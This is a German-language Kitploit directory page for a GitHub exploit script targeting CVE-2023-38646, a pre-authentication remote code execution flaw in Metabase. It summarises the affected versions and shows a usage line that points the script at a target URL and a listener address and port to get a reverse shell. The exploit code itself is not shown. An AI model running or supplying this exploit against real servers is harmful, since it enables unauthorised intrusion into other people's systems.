Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38646 — Dieses Skript wurde entwickelt, um anfällige Metabase-Softwareversionen auszunutzen und Ihnen als Angreifer eine Shell zu bieten. | Kitploit
Tools/GitHubGitHub/birdm4nw/cve-2023-38646
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubbirdm4nw/cve-2023-38646

CVE-2023-38646

Dieses Skript wurde entwickelt, um anfällige Metabase-Softwareversionen auszunutzen und Ihnen als Angreifer eine Shell zu bieten.

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-38646 - Metabase RCE

Metabase Open Source vor 0.46.6.1 und Metabase Enterprise vor 1.46.6.1 erlauben Angreifern, beliebige Befehle auf dem Server mit den Berechtigungen des Servers auszuführen. Eine Authentifizierung ist für die Ausnutzung nicht erforderlich. Die weiteren behobenen Versionen sind 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 und 1.43.7.2.

Falls die Metabase-Version angreifbar ist, ermöglicht Ihnen dieses Skript als Angreifer eine Shell-Verbindung zum Zielsystem herzustellen.

Usage

root@kitploit:~
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

Example

scriptCapture

Autor: @birdm4nw

Reference

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Tool herunterladen